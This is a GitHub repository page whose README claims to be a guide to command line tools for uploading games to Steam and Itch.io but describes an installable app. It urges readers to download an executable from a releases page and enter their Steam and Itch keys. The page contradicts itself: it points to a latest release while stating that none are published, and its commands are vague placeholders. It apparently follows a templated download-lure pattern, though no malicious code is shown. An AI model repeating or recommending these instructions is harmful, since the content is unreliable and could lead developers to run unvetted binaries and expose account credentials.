Skip to content

๐Ÿš€ Streamline game uploads to Steam and Itch with this guide on using command line tools for efficient integration and management.

License

Notifications You must be signed in to change notification settings

abu333294/Steam-And-Itch-Command-Line-Tools-Guide

Folders and files

NameName
Last commit message
Last commit date

Latest commit

ย 

History

5 Commits
ย 
ย 
ย 
ย 
ย 
ย 

Repository files navigation

๐ŸŽฎ Steam-And-Itch-Command-Line-Tools-Guide - Effortlessly Upload Games to Steam and Itch

Download Latest Release

๐Ÿš€ Getting Started

Welcome to the Steam-And-Itch-Command-Line-Tools-Guide! This application helps you easily upload your games to both Steam and Itch using command line tools. This guide will walk you through the installation and usage of the software.

๐Ÿ“‹ Prerequisites

Before you begin, ensure you have the following ready:

  • A computer running Windows, macOS, or Linux.
  • A Steam and an Itch.io developer account to upload your games.

๐Ÿ’ป Download & Install

Visit this page to download: Releases Page.

Once on the releases page, follow these steps:

  1. Locate the latest release.
  2. Click on the appropriate package for your operating system (Windows, macOS, Linux).
  3. Download the file to your computer.

๐Ÿ“ฆ Installation Steps

For Windows:

  1. Double-click the downloaded .exe file.
  2. Follow the on-screen instructions to complete the installation.
  3. Open your command prompt.

For macOS:

  1. Open the downloaded .dmg file.
  2. Drag the application into your Applications folder.
  3. Open the Terminal.

For Linux:

  1. Extract the downloaded .tar.gz file.
  2. Open your terminal and navigate to the extracted folder.
  3. Run the command ./install.sh to install.

๐Ÿ”ง Using the Application

Initial Setup

  1. Open the command line interface (Command Prompt, Terminal).
  2. Navigate to the application directory using the cd command.
  3. Configure your Steam and Itch credentials by running:
    • ./configure --steam [your_steam_key]
    • ./configure --itch [your_itch_key]

Uploading Your Game

To upload your game, use the following command template:

./upload --platform [steam/itch] --game [game_name] --path [path_to_your_game_files]
  • Replace [platform] with either steam or itch.
  • Substitute [game_name] with the name of your game.
  • Change [path_to_your_game_files] to the location of your game on your computer.

Checking Upload Status

To check the status of your uploads, use:

./status

This command will show you the current status of your game uploads and any potential errors.

โ“ Troubleshooting Common Issues

If you encounter issues while using the command line tools, consider the following solutions:

  1. Incorrect Credentials: Double-check your Steam and Itch credentials.
  2. Network Errors: Ensure you have a stable internet connection.
  3. File Path Issues: Verify the path to your game files is correct.

If problems persist, check the issue tracker for solutions from the community.

๐Ÿ”‘ Key Features

  • Cross-Platform Support: Use on Windows, macOS, and Linux.
  • Simple Command Line Interface: Easily upload your games without complicated setups.
  • Status Check: Quickly verify the status of your uploads.

๐ŸŒ Support and Contributions

Your feedback is important. If you have questions, encounter problems, or would like to contribute, feel free to reach out. Submit issues or feature requests through the GitHub Issues page.

Thank you for using the Steam-And-Itch-Command-Line-Tools-Guide! Happy uploading!

Visit this page to download: Releases Page.

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •